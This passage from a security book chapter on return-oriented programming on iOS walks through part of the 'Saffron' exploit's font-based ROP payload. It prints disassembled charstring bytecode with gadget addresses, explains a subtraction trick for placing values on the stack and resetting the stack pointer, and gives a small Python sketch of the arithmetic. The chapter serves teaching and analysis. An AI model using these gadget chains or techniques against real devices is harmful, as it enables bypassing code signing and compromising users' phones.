0x00000b0e  ff 00 15 00 00     push 0x15           
0x00000b13  0c 10        callothersubr #21 nargs=2 ; subtract top[0] -= top[1]; top++

Because some values cannot be pushed onto the application stack, a trick is used. This trick consists of subtracting two legal values to leave the requested one on the stack. In the previous code, 0x10000539 and 0x10000000 are passed as parameters to routine 21. The result of the subtraction, 1337, is pushed onto the stack. The payload then stores 1337 into R0 by means of the gadget located at 0x30005e97:

0x00000b17  8b           push 0x0                
0x00000b18  8f           push 0x4                
0x00000b19  0a           callsubr #04             ; subr_put_dword
0x00000b1a  ff 30 00 5e 97   push 0x30005e97         
0x00000b1f  ff 00 05 00 00   push 0x5            
0x00000b24  0a           callsubr #05             ; subr_put_dword_adjust_lib

At this point the only part of the payload missing is to set the stack pointer to a safe location that will not crash the browser:

0x00000b25  8b           push 0x0                
0x00000b26  8f           push 0x4                
0x00000b27  0a           callsubr #04             ; subr_put_dword
0x00000b28  ff 10 00 01 b0  push 0x100001b0         
0x00000b2d  ff 10 00 00 00  push 0x10000000         
0x00000b32  ff 00 02 00 00  push 0x2           
0x00000b37  ff 00 15 00 00  push 0x15           
0x00000b3c  0c 10         callothersubr #21 nargs=2 ; subtract top[0] -= top[1]; top++
0x00000b3e  91           push 0x6                
0x00000b3f  0a           callsubr #06             ; 6
0x00000b40  ff 30 00 5d b5  push 0x30005db5         
0x00000b45  ff 00 05 00 00  push 0x5            

The preceding code will, using the usual subtraction trick, push 0x1b0 onto the stack. This value is later added to the value, a stack offset, obtained by routine 6. The gadget at 0x30005db5 sets the stack pointer at the previous value decremented by 0x18, pops from that stack location a number of registers, and resumes MobileSafari execution.
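The subtraction trick and the final stack pointer computation can be checked with a short Python sketch. The constants 0x10000000, 0x10000539, 0x100001b0, and 0x18 come from the preceding listings and text; the function names and the sample stack offset are hypothetical.

```python
BASE = 0x10000000  # value used as the subtrahend in the listings

def as_difference(target, base=BASE):
    """Return two values whose difference is the requested target."""
    return base + target, base

def resume_stack_pointer(stack_offset, delta=0x1b0, adjust=0x18):
    """Stack offset plus the pushed delta, decremented by the gadget."""
    return stack_offset + delta - adjust

r0_pair = as_difference(1337)    # operands that leave 1337 for R0
sp_pair = as_difference(0x1b0)   # operands that leave the 0x1b0 delta
new_sp = resume_stack_pointer(0x2fe00000)  # made-up stack offset
```

Both pairs match the operands pushed before the calls to routine 21 in the listings.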

Saffron is clearly a very sophisticated and complex exploit. Hopefully, you have gained some understanding of how the ROP payload inside it works. On the book's website two scripts, Saffron-dump.py and Saffron-ROP-dump.py, are available to help with the dump and analysis of the rest of the shellcode.

Summary

In this chapter you have seen how DEP and code signing can be circumvented using ROP. You started from the original return-to-libc technique and went all the way down to ROP automation.

We proposed a simple way of testing ROP payloads and gave you an overview of what an attacker is capable of doing using this technique on iOS.

Finally, we showed you two real-life examples of complex ROP payloads. The first one exfiltrates data from the phone, and the second one uses a ROP payload to exploit a local kernel vulnerability.
